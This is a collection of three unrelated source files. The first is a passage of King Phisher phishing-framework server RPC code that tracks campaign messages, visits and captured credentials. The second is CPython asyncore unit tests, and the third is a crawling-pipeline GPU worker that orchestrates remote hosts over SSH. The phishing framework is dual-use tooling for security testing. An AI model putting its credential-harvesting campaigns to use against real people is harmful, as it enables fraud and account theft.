message = _message_new(handler, session, campaign_id, email_id, target_email, first_name, last_name, department_name=department_name)
message.assert_session_has_permissions('c', handler.rpc_session)
session.add(message)
session.commit()
@register_rpc('/campaign/message/new/deferred', database_access=True, log_call=True)
def rpc_campaign_message_new(handler, session, campaign_id, email_id, target_email, first_name, last_name, department_name=None):
"""
Record a message that has been sent as part of a campaign. These details can
be retrieved later for value substitution in template pages.
:param int campaign_id: The ID of the campaign.
:param str email_id: The message id of the sent email.
:param str target_email: The email address that the message was sent to.
:param str first_name: The first name of the message's recipient.
:param str last_name: The last name of the message's recipient.
:param str department_name: The name of the company department that the message's recipient belongs to.
"""
message = _message_new(handler, session, campaign_id, email_id, target_email, first_name, last_name, department_name=department_name)
message.sent = db_models.sql_null()
message.assert_session_has_permissions('c', handler.rpc_session)
session.add(message)
session.commit()
@register_rpc('/campaign/stats', database_access=True, log_call=True)
def rpc_campaign_stats(handler, session, campaign_id):
"""
Generate statistics regarding the specified campaign and return them in a
dictionary. The dictionary will contain the keys credentials,
credentials-unique, messages, messages-trained, visits, visits-unique.
Values with unique in the key are counted unique by the message id for
which they are associated.
:param campaign_id: The unique ID of the campaign to generate statistics for.
:return: The statistics for the specified campaign.
:rtype: dict
"""
stats = {}
stats['credentials'] = session.query(db_models.Credential).filter_by(campaign_id=campaign_id).count()
stats['credentials-unique'] = session.query(db_models.Credential).filter_by(campaign_id=campaign_id).distinct(db_models.Credential.message_id).count()
stats['messages'] = session.query(db_models.Message).filter_by(campaign_id=campaign_id).count()
stats['messages-trained'] = session.query(db_models.Message).filter_by(campaign_id=campaign_id, trained=True).count()
stats['visits'] = session.query(db_models.Visit).filter_by(campaign_id=campaign_id).count()
stats['visits-unique'] = session.query(db_models.Visit).filter_by(campaign_id=campaign_id).distinct(db_models.Visit.message_id).count()
return stats
@register_rpc('/db/table/count', database_access=True)
def rpc_database_count_rows(handler, session, table_name, query_filter=None):
"""
Get a count of the rows in the specified table where the search
criteria matches.
:param str table_name: The name of the database table to query.
:param dict query_filter: A dictionary mapping optional search criteria for matching the query.
:return: The number of matching rows.
:rtype: int
"""
metatable = database_tables.get(table_name)
if not metatable:
raise errors.KingPhisherAPIError("failed to get table object for: {0}".format(table_name))
query_filter = query_filter or {}
for column in query_filter.keys():
if column not in metatable.column_names:
raise errors.KingPhisherAPIError("column {0} is invalid for table {1}".format(column, table_name))
query = session.query(metatable.model)
query = query.filter_by(**query_filter)
return query.count()
@register_rpc('/db/table/view', database_access=True)
def rpc_database_view_rows(handler, session, table_name, page=0, query_filter=None):
"""
Retrieve the rows from the specified table where the search
criteria matches.
:param str table_name: The name of the database table to query.
:param int page: The page number to retrieve results for.
:param dict query_filter: A dictionary mapping optional search criteria for matching the query.
:return: A dictionary with columns and rows keys.
:rtype: dict
"""
metatable = database_tables.get(table_name)
if not metatable:
raise errors.KingPhisherAPIError("failed to get table object for: {0}".format(table_name))
query_filter = query_filter or {}
for column in query_filter.keys():
if column not in metatable.column_names:
raise errors.KingPhisherAPIError("column {0} is invalid for table {1}".format(column, table_name))
offset = page * VIEW_ROW_COUNT
# it's critical that the columns are in the order that the client is expecting
rows = []
query = session.query(metatable.model)
query = query.filter_by(**query_filter)
total_rows = query.count()
for row in query[offset:]:
if len(rows) == VIEW_ROW_COUNT:
break
if row.session_has_permissions('r', handler.rpc_session):
rows.append([getattr(row, c) for c in metatable.column_names])
if not len(rows):
return None
return {'columns': metatable.column_names, 'rows': rows, 'total_rows': total_rows, 'page_size': VIEW_ROW_COUNT}
@register_rpc('/db/table/delete', database_access=True, log_call=True)
def rpc_database_delete_row_by_id(handler, session, table_name, row_id):
"""
Delete the row from the table with the specified value in the id column.
If the row does not exist, no error is raised.
:param str table_name: The name of the database table to delete a row from.
:param row_id: The id value.
"""
metatable = database_tables.get(table_name)
if not metatable:
raise errors.KingPhisherAPIError("failed to get table object for: {0}".format(table_name))
row = db_manager.get_row_by_id(session, metatable.model, row_id)
if row is None:
logger = logging.getLogger('KingPhisher.Server.API.RPC')
logger.debug("received delete request for non existing row with id {0} from table {1}".format(row_id, table_name))
return
row.assert_session_has_permissions('d', handler.rpc_session)
session.delete(row)
session.commit()
@register_rpc('/db/table/delete/multi', database_access=True, log_call=True)
def rpc_database_delete_rows_by_id(handler, session, table_name, row_ids):
"""
Delete multiple rows from a table with the specified values in the id
column. If a row id specified in *row_ids* does not exist, then it will
be skipped and no error will be thrown.
:param str table_name: The name of the database table to delete rows from.
:param list row_ids: The row ids to delete.
:return: The row ids that were deleted.
:rtype: list
"""
metatable = database_tables.get(table_name)
if not metatable:
raise errors.KingPhisherAPIError("failed to get table object for: {0}".format(table_name))
deleted_rows = []
for row_id in row_ids:
row = db_manager.get_row_by_id(session, metatable.model, row_id)
if not row:
continue
if not row.session_has_permissions('d', handler.rpc_session):
continue
session.delete(row)
deleted_rows.append(row_id)
session.commit()
return deleted_rows
@register_rpc('/db/table/get', database_access=True)
def rpc_database_get_row_by_id(handler, session, table_name, row_id):
"""
Retrieve a row from a given table with the specified value in the
id column.
:param str table_name: The name of the database table to retrieve a row from.
:param row_id: The id value.
:return: The specified row data.
:rtype: dict
"""
metatable = database_tables.get(table_name)
if not metatable:
raise errors.KingPhisherAPIError("failed to get table object for: {0}".format(table_name))
row = db_manager.get_row_by_id(session, metatable.model, row_id)
if row:
row.assert_session_has_permissions('r', handler.rpc_session)
row = dict(zip(metatable.column_names, (getattr(row, c) for c in metatable.column_names)))
elif metatable.model.is_private:
raise errors.KingPhisherPermissionError()
return row
@register_rpc('/db/table/insert', database_access=True)
def rpc_database_insert_row(handler, session, table_name, keys, values):
"""
Insert a new row into the specified table.
:param str table_name: The name of the database table to insert a new row into.
:param list keys: The column names of *values*.
:param list values: The values to be inserted in the row.
:return: The id of the new row that has been added.
"""
if not isinstance(keys, (list, tuple)):
keys = (keys,)
if not isinstance(values, (list, tuple)):
values = (values,)
if len(keys) != len(values):
raise errors.KingPhisherAPIError('the number of keys does not match the number of values')
metatable = database_tables.get(table_name)
if not metatable:
raise errors.KingPhisherAPIError("failed to get table object for: {0}".format(table_name))
for key in keys:
if key not in metatable.column_names:
raise errors.KingPhisherAPIError("column {0} is invalid for table {1}".format(key, table_name))
row = metatable.model()
for key, value in zip(keys, values):
setattr(row, key, value)
row.assert_session_has_permissions('c', handler.rpc_session)
session.add(row)
session.commit()
return row.id
@register_rpc('/db/table/insert/multi', database_access=True)
def rpc_database_insert_row_multi(handler, session, table_name, keys, rows, deconflict_ids=False):
"""
Insert multiple new rows into the specified table. If *deconflict_ids* is
true, new id values will be assigned as necessary to merge the data into
the database. This function will fail if constraints for the table are
not met.
:param str table_name: The name of the database table to insert data into.
:param list keys: The column names of the values in *rows*.
:param list rows: A list of rows, each row is a list of values ordered and identified by *keys* to be inserted.
:return: List of ids of the newly inserted rows.
:rtype: list
"""
inserted_rows = collections.deque()
if not isinstance(keys, list):
keys = list(keys)
if not isinstance(rows, list):
rows = list(rows)
metatable = database_tables.get(table_name)
if not metatable:
raise errors.KingPhisherAPIError('failed to get table object for: {0}'.format(table_name))
for key in keys:
if key not in metatable.column_names:
raise errors.KingPhisherAPIError('column {0} is invalid for table {1}'.format(keys, table_name))
for row in rows:
if len(row) != len(keys):
raise errors.KingPhisherAPIError('row is not the same length as the number of values defined')
row = dict(zip(keys, row))
if 'id' in row and db_manager.get_row_by_id(session, metatable.model, row['id']) is not None:
if deconflict_ids:
row['id'] = None
else:
raise errors.KingPhisherAPIError('row id conflicts with an existing value')
table_row = metatable.model(**row)
table_row.assert_session_has_permissions('c', handler.rpc_session)
session.add(table_row)
inserted_rows.append(table_row)
session.commit()
return [row.id for row in inserted_rows]
@register_rpc('/db/table/set', database_access=True)
def rpc_database_set_row_value(handler, session, table_name, row_id, keys, values):
"""
Set values for a row in the specified table with an id of *row_id*.
:param str table_name: The name of the database table to set the values of the specified row.
:param tuple keys: The column names of *values*.
:param tuple values: The values to be updated in the row.
"""
if not isinstance(keys, (list, tuple)):
keys = (keys,)
if not isinstance(values, (list, tuple)):
values = (values,)
if len(keys) != len(values):
raise errors.KingPhisherAPIError('the number of keys does not match the number of values')
metatable = database_tables.get(table_name)
if not metatable:
raise errors.KingPhisherAPIError("failed to get table object for: {0}".format(table_name))
for key, value in zip(keys, values):
if key not in metatable.column_names:
raise errors.KingPhisherAPIError("column {0} is invalid for table {1}".format(key, table_name))
row = db_manager.get_row_by_id(session, metatable.model, row_id)
if not row:
raise errors.KingPhisherAPIError("failed to get row id: {0} from table: {1}".format(row_id, table_name))
row.assert_session_has_permissions('u', handler.rpc_session)
for key, value in zip(keys, values):
setattr(row, key, value)
row.assert_session_has_permissions('u', handler.rpc_session)
session.commit()
@register_rpc('/events/is_subscribed', log_call=True)
def rpc_events_is_subscribed(handler, event_id, event_type):
"""
Check if the client is currently subscribed to the specified server event.
:param str event_id: The identifier of the event to subscribe to.
:param str event_type: A sub-type for the corresponding event.
:return: Whether or not the client is subscribed to the event.
:rtype: bool
"""
if not isinstance(event_id, str):
raise errors.KingPhisherAPIError('a valid event id must be specified')
if not isinstance(event_type, str):
raise errors.KingPhisherAPIError('a valid event type must be specified')
event_socket = handler.rpc_session.event_socket
if event_socket is None:
raise errors.KingPhisherAPIError('the event socket is not open for this session')
return event_socket.is_subscribed(event_id, event_type)
@register_rpc('/events/subscribe', log_call=True)
def rpc_events_subscribe(handler, event_id, event_types=None, attributes=None):
"""
Subscribe the client to the specified event published by the server.
When the event is published the specified *attributes* of it and it's
corresponding id and type information will be sent to the client.
:param str event_id: The identifier of the event to subscribe to.
:param list event_types: A list of sub-types for the corresponding event.
:param list attributes: A list of attributes of the event object to be sent to the client.
"""
if not isinstance(event_id, str):
raise errors.KingPhisherAPIError('a valid event id must be specified')
event_socket = handler.rpc_session.event_socket
if event_socket is None:
raise errors.KingPhisherAPIError('the event socket is not open for this session')
if not event_id.startswith('db-'):
# db-<table name> events are the only ones that are valid right now
raise errors.KingPhisherAPIError('invalid event_id: ' + event_id)
table_name = event_id[3:]
table_name = table_name.replace('-', '_')
metatable = database_tables.get(table_name)
if metatable is None:
raise errors.KingPhisherAPIError("invalid table object: {0}".format(table_name))
for event_type in event_types:
if event_type not in ('deleted', 'inserted', 'updated'):
raise errors.KingPhisherAPIError("event type {0} is invalid for db-* events".format(event_type))
for column in attributes:
if column not in metatable.column_names:
raise errors.KingPhisherAPIError("column {0} is invalid for table {1}".format(column, table_name))
return event_socket.subscribe(event_id, event_types=event_types, attributes=attributes)
@register_rpc('/events/unsubscribe', log_call=True)
def rpc_events_unsubscribe(handler, event_id, event_types=None, attributes=None):
"""
Unsubscribe from an event published by the server that the client
previously subscribed to.
:param str event_id: The identifier of the event to subscribe to.
:param list event_types: A list of sub-types for the corresponding event.
:param list attributes: A list of attributes of the event object to be sent to the client.
"""
if not isinstance(event_id, str):
raise errors.KingPhisherAPIError('a valid event id must be specified')
event_socket = handler.rpc_session.event_socket
if event_socket is None:
raise errors.KingPhisherAPIError('the event socket is not open for this session')
return event_socket.unsubscribe(event_id, event_types=event_types, attributes=attributes)
@register_rpc('/geoip/lookup', log_call=True)
def rpc_geoip_lookup(handler, ip, lang=None):
"""
Look up an IP address in the servers GeoIP database. If the IP address
can not be found in the database, None will be returned.
:param str ip: The IP address to look up.
:param str lang: The language to prefer for regional names.
:return: The geographic information for the specified IP address.
:rtype: dict
"""
try:
result = geoip.lookup(ip, lang=lang)
except geoip.AddressNotFoundError:
result = None
return result
@register_rpc('/geoip/lookup/multi', log_call=True)
def rpc_geoip_lookup_multi(handler, ips, lang=None):
"""
Look up multiple IP addresses in the servers GeoIP database. Each IP
address that can not be found in the database will have its result set
to None.
:param list ips: The list of IP addresses to look up.
:param str lang: The language to prefer for regional names.
:return: A dictionary containing the results keyed by the specified IP
addresses.
:rtype: dict
"""
results = {}
for ip in ips:
try:
result = geoip.lookup(ip, lang=lang)
except geoip.AddressNotFoundError:
result = None
results[ip] = result
return results
@register_rpc('/login', database_access=True)
def rpc_login(handler, session, username, password, otp=None):
logger = logging.getLogger('KingPhisher.Server.Authentication')
if not ipaddress.ip_address(handler.client_address[0]).is_loopback:
logger.warning("failed login request from {0} for user {1}, (invalid source address)".format(handler.client_address[0], username))
raise ValueError('invalid source address for login')
fail_default = (False, ConnectionErrorReason.ERROR_INVALID_CREDENTIALS, None)
fail_otp = (False, ConnectionErrorReason.ERROR_INVALID_OTP, None)
if not (username and password):
logger.warning("failed login request from {0} for user {1}, (missing username or password)".format(handler.client_address[0], username))
return fail_default
if not handler.server.forked_authenticator.authenticate(username, password):
logger.warning("failed login request from {0} for user {1}, (authentication failed)".format(handler.client_address[0], username))
return fail_default
user = session.query(db_models.User).filter_by(name=username).first()
if not user:
logger.info('creating new user object with name: ' + username)
user = db_models.User(name=username)
elif user.has_expired:
logger.warning("failed login request from {0} for user {1}, (user has expired)".format(handler.client_address[0], username))
return fail_default
elif user.otp_secret:
if otp is None:
logger.debug("failed login request from {0} for user {1}, (missing otp)".format(handler.client_address[0], username))
return fail_otp
if not (isinstance(otp, str) and len(otp) == 6 and otp.isdigit()):
logger.warning("failed login request from {0} for user {1}, (invalid otp)".format(handler.client_address[0], username))
return fail_otp
totp = pyotp.TOTP(user.otp_secret)
now = datetime.datetime.now()
if otp not in (totp.at(now + datetime.timedelta(seconds=offset)) for offset in (0, -30, 30)):
logger.warning("failed login request from {0} for user {1}, (invalid otp)".format(handler.client_address[0], username))
return fail_otp
user.last_login = db_models.current_timestamp()
session.add(user)
session.commit()
session_id = handler.server.session_manager.put(user.id)
logger.info("successful login request from {0} for user {1}".format(handler.client_address[0], username))
signals.send_safe('rpc-user-logged-in', logger, handler, session=session_id, name=username)
return True, ConnectionErrorReason.SUCCESS, session_id
@register_rpc('/logout', log_call=True)
def rpc_logout(handler):
rpc_session = handler.rpc_session
if rpc_session.event_socket is not None:
rpc_session.event_socket.close()
handler.server.session_manager.remove(handler.rpc_session_id)
logger = logging.getLogger('KingPhisher.Server.Authentication')
logger.info("successful logout request from {0} for user {1}".format(handler.client_address[0], rpc_session.user))
signals.send_safe('rpc-user-logged-out', logger, handler, session=handler.rpc_session_id, name=rpc_session.user)
@register_rpc('/plugins/list', log_call=True)
def rpc_plugins_list(handler):
"""
Return information regarding enabled plugins in the server.
:return: A dictionary representing enabled plugins and their meta-data.
:rtype: dict
"""
plugin_manager = handler.server.plugin_manager
plugins = {}
for _, plugin in plugin_manager:
plugins[plugin.name] = {
'description': plugin.description,
'name': plugin.name,
'title': plugin.title,
'version': plugin.version
}
return plugins
@register_rpc('/graphql', database_access=True)
def rpc_graphql(handler, session, query, query_vars=None):
"""
Execute a GraphQL query and return the results. If the query fails to
execute the errors returned are populated in the **errors** key of the
results dictionary. If the query executes successfully the returned data
is available in the **data** key of the results dictionary.
:param str query: The GraphQL query to execute.
:param dict query_vars: Any variables needed by the *query*.
:return: The results of the query as a dictionary.
:rtype: dict
"""
query_vars = query_vars or {}
result = graphql_schema.execute(
query,
context_value={
'plugin_manager': handler.server.plugin_manager,
'rpc_session': handler.rpc_session,
'session': session
},
variable_values=query_vars
)
errors = None
if result.errors:
errors = []
for error in result.errors:
if hasattr(error, 'message'):
errors.append(error.message)
elif hasattr(error, 'args') and error.args:
errors.append(str(error.args[0]))
else:
errors.append(repr(error))
return {'data': result.data, 'errors': errors}
|
test_asyncore.py
|
import asyncore
import unittest
import select
import os
import socket
import threading
import sys
import time
from test import test_support
from test.test_support import TESTFN, run_unittest, unlink
from StringIO import StringIO
HOST = test_support.HOST
class dummysocket:
def __init__(self):
self.closed = False
def close(self):
self.closed = True
def fileno(self):
return 42
class dummychannel:
def __init__(self):
self.socket = dummysocket()
def close(self):
self.socket.close()
class exitingdummy:
def __init__(self):
pass
def handle_read_event(self):
raise asyncore.ExitNow()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
class crashingdummy:
def __init__(self):
self.error_handled = False
def handle_read_event(self):
raise Exception()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
def handle_error(self):
self.error_handled = True
# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv):
try:
serv.listen(5)
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 200
while n > 0:
r, w, e = select.select([conn], [], [])
if r:
data = conn.recv(10)
# keep everything except for the newline terminator
buf.write(data.replace('\n', ''))
if '\n' in data:
break
n -= 1
time.sleep(0.01)
conn.close()
finally:
serv.close()
evt.set()
class HelperFunctionTests(unittest.TestCase):
def test_readwriteexc(self):
# Check exception handling behavior of read, write and _exception
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore read/write/_exception calls
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.read, tr1)
self.assertRaises(asyncore.ExitNow, asyncore.write, tr1)
self.assertRaises(asyncore.ExitNow, asyncore._exception, tr1)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asyncore.read(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore.write(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore._exception(tr2)
self.assertEqual(tr2.error_handled, True)
# asyncore.readwrite uses constants in the select module that
# are not present in Windows systems (see this thread:
# http://mail.python.org/pipermail/python-list/2001-October/109973.html)
# These constants should be present as long as poll is available
if hasattr(select, 'poll'):
def test_readwrite(self):
# Check that correct methods are called by readwrite()
class testobj:
def __init__(self):
self.read = False
self.write = False
self.closed = False
self.expt = False
def handle_read_event(self):
self.read = True
def handle_write_event(self):
self.write = True
def handle_close(self):
self.closed = True
def handle_expt_event(self):
self.expt = True
def handle_error(self):
self.error_handled = True
for flag in (select.POLLIN, select.POLLPRI):
tobj = testobj()
self.assertEqual(tobj.read, False)
asyncore.readwrite(tobj, flag)
self.assertEqual(tobj.read, True)
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore readwrite call
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1, flag)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asyncore.readwrite(tr2, flag)
self.assertEqual(tr2.error_handled, True)
tobj = testobj()
self.assertEqual(tobj.write, False)
asyncore.readwrite(tobj, select.POLLOUT)
self.assertEqual(tobj.write, True)
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore readwrite call
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1,
select.POLLOUT)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asyncore.readwrite(tr2, select.POLLOUT)
self.assertEqual(tr2.error_handled, True)
for flag in (select.POLLERR, select.POLLHUP, select.POLLNVAL):
tobj = testobj()
self.assertEqual((tobj.expt, tobj.closed)[flag == select.POLLHUP], False)
asyncore.readwrite(tobj, flag)
self.assertEqual((tobj.expt, tobj.closed)[flag == select.POLLHUP], True)
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore readwrite calls
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1, flag)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asyncore.readwrite(tr2, flag)
self.assertEqual(tr2.error_handled, True)
def test_closeall(self):
self.closeall_check(False)
def test_closeall_default(self):
self.closeall_check(True)
def closeall_check(self, usedefault):
# Check that close_all() closes everything in a given map
l = []
testmap = {}
for i in range(10):
c = dummychannel()
l.append(c)
self.assertEqual(c.socket.closed, False)
testmap[i] = c
if usedefault:
socketmap = asyncore.socket_map
try:
asyncore.socket_map = testmap
asyncore.close_all()
finally:
testmap, asyncore.socket_map = asyncore.socket_map, socketmap
else:
asyncore.close_all(testmap)
self.assertEqual(len(testmap), 0)
for c in l:
self.assertEqual(c.socket.closed, True)
def test_compact_traceback(self):
try:
raise Exception("I don't like spam!")
except:
real_t, real_v, real_tb = sys.exc_info()
r = asyncore.compact_traceback()
else:
self.fail("Expected exception")
(f, function, line), t, v, info = r
self.assertEqual(os.path.split(f)[-1], 'test_asyncore.py')
self.assertEqual(function, 'test_compact_traceback')
self.assertEqual(t, real_t)
self.assertEqual(v, real_v)
self.assertEqual(info, '[%s|%s|%s]' % (f, function, line))
class DispatcherTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_basic(self):
d = asyncore.dispatcher()
self.assertEqual(d.readable(), True)
self.assertEqual(d.writable(), True)
def test_repr(self):
d = asyncore.dispatcher()
self.assertEqual(repr(d), '<asyncore.dispatcher at %#x>' % id(d))
def test_log(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log() (to stderr)
fp = StringIO()
stderr = sys.stderr
l1 = "Lovely spam! Wonderful spam!"
l2 = "I don't like spam!"
try:
sys.stderr = fp
d.log(l1)
d.log(l2)
finally:
sys.stderr = stderr
lines = fp.getvalue().splitlines()
self.assertEquals(lines, ['log: %s' % l1, 'log: %s' % l2])
def test_log_info(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log_info() (to stdout via print)
fp = StringIO()
stdout = sys.stdout
l1 = "Have you got anything without spam?"
l2 = "Why can't she have egg bacon spam and sausage?"
l3 = "THAT'S got spam in it!"
try:
sys.stdout = fp
d.log_info(l1, 'EGGS')
d.log_info(l2)
d.log_info(l3, 'SPAM')
finally:
sys.stdout = stdout
lines = fp.getvalue().splitlines()
if __debug__:
expected = ['EGGS: %s' % l1, 'info: %s' % l2, 'SPAM: %s' % l3]
else:
expected = ['EGGS: %s' % l1, 'SPAM: %s' % l3]
self.assertEquals(lines, expected)
def test_unhandled(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log_info() (to stdout via print)
fp = StringIO()
stdout = sys.stdout
try:
sys.stdout = fp
d.handle_expt()
d.handle_read()
d.handle_write()
d.handle_connect()
d.handle_accept()
finally:
sys.stdout = stdout
lines = fp.getvalue().splitlines()
expected = ['warning: unhandled exception',
'warning: unhandled read event',
'warning: unhandled write event',
'warning: unhandled connect event',
'warning: unhandled accept event']
self.assertEquals(lines, expected)
class dispatcherwithsend_noread(asyncore.dispatcher_with_send):
def readable(self):
return False
def handle_connect(self):
pass
class DispatcherWithSendTests(unittest.TestCase):
usepoll = False
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_send(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(3)
self.port = test_support.bind_port(self.sock)
cap = StringIO()
args = (self.evt, cap, self.sock)
threading.Thread(target=capture_server, args=args).start()
# wait a little longer for the server to initialize (it sometimes
# refuses connections on slow machines without this wait)
time.sleep(0.2)
data = "Suppose there isn't a 16-ton weight?"
d = dispatcherwithsend_noread()
d.create_socket(socket.AF_INET, socket.SOCK_STREAM)
d.connect((HOST, self.port))
# give time for socket to connect
time.sleep(0.1)
d.send(data)
d.send(data)
d.send('\n')
n = 1000
while d.out_buffer and n > 0:
asyncore.poll()
n -= 1
self.evt.wait()
self.assertEqual(cap.getvalue(), data*2)
class DispatcherWithSendTests_UsePoll(DispatcherWithSendTests):
usepoll = True
if hasattr(asyncore, 'file_wrapper'):
class FileWrapperTest(unittest.TestCase):
def setUp(self):
self.d = "It's not dead, it's sleeping!"
file(TESTFN, 'w').write(self.d)
def tearDown(self):
unlink(TESTFN)
def test_recv(self):
fd = os.open(TESTFN, os.O_RDONLY)
w = asyncore.file_wrapper(fd)
os.close(fd)
self.assertNotEqual(w.fd, fd)
self.assertNotEqual(w.fileno(), fd)
self.assertEqual(w.recv(13), "It's not dead")
self.assertEqual(w.read(6), ", it's")
w.close()
self.assertRaises(OSError, w.read, 1)
def test_send(self):
d1 = "Come again?"
d2 = "I want to buy some cheese."
fd = os.open(TESTFN, os.O_WRONLY | os.O_APPEND)
w = asyncore.file_wrapper(fd)
os.close(fd)
w.write(d1)
w.send(d2)
w.close()
self.assertEqual(file(TESTFN).read(), self.d + d1 + d2)
def test_main():
tests = [HelperFunctionTests, DispatcherTests, DispatcherWithSendTests,
DispatcherWithSendTests_UsePoll]
if hasattr(asyncore, 'file_wrapper'):
tests.append(FileWrapperTest)
run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
gpu.py
|
import os
import re
import sys
import time
import trio
import uuid
import string
import random
import shutil
import curses
import zipfile
import clip_filter
import pandas as pd
import infrastructure
from glob import glob
from tqdm import tqdm
from pathlib import Path
from colorama import Fore
from gevent import joinall
sys.path.append('./crawlingathome-worker/')
from multiprocessing import JoinableQueue, Process
from pssh.clients import ParallelSSHClient, SSHClient
def incoming_worker(workers, queue: JoinableQueue, inpsize: JoinableQueue, errors: JoinableQueue):
print (f"inbound worker started")
pclient = ParallelSSHClient(workers, user='crawl', pkey="~/.ssh/id_cah", identity_auth=False )
while True:
try:
ready = []
output = pclient.run_command('test -f /home/crawl/semaphore')
pclient.join(output)
for host_output in output:
hostname = host_output.host
exit_code = host_output.exit_code
if exit_code == 0:
ready.append(hostname)
errors.put(f"Ready workers for download: {len(ready)}")
if len(ready) > 0:
inpsize.put(len(ready))
_start = time.time()
dclient = ParallelSSHClient(ready, user='crawl', pkey="~/.ssh/id_cah", identity_auth=False)
try:
cmds = dclient.copy_remote_file('/home/crawl/gpujob.zip', 'gpujob.zip')
joinall (cmds, raise_error=False)
except Exception as e:
print(e)
errors.put(f"all jobs downloaded in {round(time.time()-_start, 2)} seconds")
dclient.run_command('rm -rf /home/crawl/gpujob.zip')
dclient.run_command('rm -rf /home/crawl/semaphore')
for file in glob('gpujob.zip_*'):
name, ip = file.split("_")
output_folder = "./" + ip.replace(".", "-") + "/save/"
img_output_folder = output_folder + "images/"
if os.path.exists(output_folder):
shutil.rmtree(output_folder)
os.makedirs(output_folder)
os.makedirs(img_output_folder)
try:
with zipfile.ZipFile(file, 'r') as zip_ref:
zip_ref.extractall(ip.replace(".", "-")+"/")
queue.put(ip)
except:
aclient = SSHClient(ip, user='crawl', pkey="~/.ssh/id_cah", identity_auth=False)
aclient.execute('touch /home/crawl/gpuabort')
aclient.disconnect()
os.remove(file)
inpsize.get()
inpsize.task_done() # empty impsize queue to signal no work to be done
else:
time.sleep(15)
except Exception as e:
print(f"some inbound problem occured: {e}")
def outgoing_worker(queue: JoinableQueue, errors: JoinableQueue, local):
print (f"outbound worker started")
while True:
try:
while queue.qsize() > 0:
ip, filtered = queue.get()
aclient = SSHClient(ip, user='crawl', pkey="~/.ssh/id_cah", identity_auth=False)
if local:
#os.system(f"mv {base}/gpujobdone.zip results/{time.time()}.zip")
aclient.execute(f"echo {filtered} > /home/crawl/gpulocal")
else:
base = "./" + str(ip.replace(".", "-"))
output_folder = base + "/save/"
img_output_folder = output_folder + "images/"
# clean img_output_folder now since we have all results do not want to transfer back all images...
try:
shutil.rmtree(img_output_folder)
except OSError as e:
print("[GPU] Error deleting images: %s - %s." %
(e.filename, e.strerror))
# send GPU results
shutil.make_archive(base + "/gpujobdone", "zip", base, "save")
aclient.scp_send(base + "/gpujobdone.zip", "gpujobdone.zip")
os.remove(base + "/gpujobdone.zip")
aclient.execute("touch gpusemaphore")
aclient.disconnect()
queue.task_done()
else:
time.sleep(5)
except Exception as e:
print(f"some outbound problem occured: {e}")
def gpu_worker(inbound: JoinableQueue, outbound: JoinableQueue, counter: JoinableQueue, errors: JoinableQueue, gpuflag: JoinableQueue, concat):
print (f"gpu worker started")
while True:
if not os.path.exists("./save/"):
os.makedirs("./save/")
if not os.path.exists("./stats/"):
os.makedirs("./stats/")
if inbound.qsize() > concat - 1:
gpuflag.put(1)
ips = []
dframes = []
shards = []
concat_parse = pd.DataFrame()
for i in range(concat):
ip = inbound.get()
output_folder = "./" + ip.replace(".", "-") + "/save/"
ips.append(ip)
all_csv_files = []
for path, subdir, files in os.walk(output_folder):
for file in glob(os.path.join(path, "*.csv")):
all_csv_files.append(file)
# get name of csv file
out_path = all_csv_files[0]
out_fname = Path(out_path).stem.strip("_unfiltered").strip("_parsed").strip(".")
shards.append(out_fname)
os.system(f"mv {output_folder + out_fname}_parsed.csv ./stats/")
# recreate parsed dataset and run CLIP filtering
dlparse_df = pd.read_csv(output_folder + out_fname + ".csv", sep="|")
dlparse_df["PATH"] = "./" + \
ip.replace(".", "-") + "/" + dlparse_df["PATH"]
if i==0:
concat_parse = dlparse_df
else:
concat_parse = concat_parse.append(dlparse_df, ignore_index=True)
dframes.append(dlparse_df)
inbound.task_done()
#final_images = clip_filter.filter(concat_parse, out_fname, output_folder, errors)
concat_fname = uuid.uuid4().hex
with open("./save/" + concat_fname + ".txt", "wt") as f:
for item in shards:
f.write(item + "\n")
#print (f"before deduplication {concat_parse.shape[0]}")
concat_parse.to_csv("./stats/" + concat_fname + "_duplicated.csv", index=False, sep="|")
concat_parse.drop_duplicates(subset=["URL","TEXT"], keep='last', inplace=True)
concat_parse.reset_index(inplace=True, drop=True)
concat_parse.to_csv("./stats/" + concat_fname + "_unfiltered.csv", index=False, sep="|")
#print (f"after deduplication {concat_parse.shape[0]}")
start = time.time()
final_images, results = clip_filter.filter(concat_parse, concat_fname, "./save/", errors)
print(f"last filtered {final_images} images in {round(time.time()-start,2)} sec")
start = time.time()
resp = os.system(f"rsync -zh save/*{concat_fname}* archiveteam@88.198.2.17::CAH")
if resp == 0:
print (f"results sent to staging in {round(time.time()-start)} sec")
for ip in ips:
outbound.put((ip, results.get(ip)))
counter.put(1)
gpuflag.get()
gpuflag.task_done()
def monitor(nodes, inbound, outbound, counter, inpsize):
# crude term monitor with 3 custom bars.. todo: move to curses module
probar = tqdm(total=int(nodes), desc="Executed GPU jobs", position=2, bar_format='{desc}: {n_fmt} ({rate_fmt}) ')
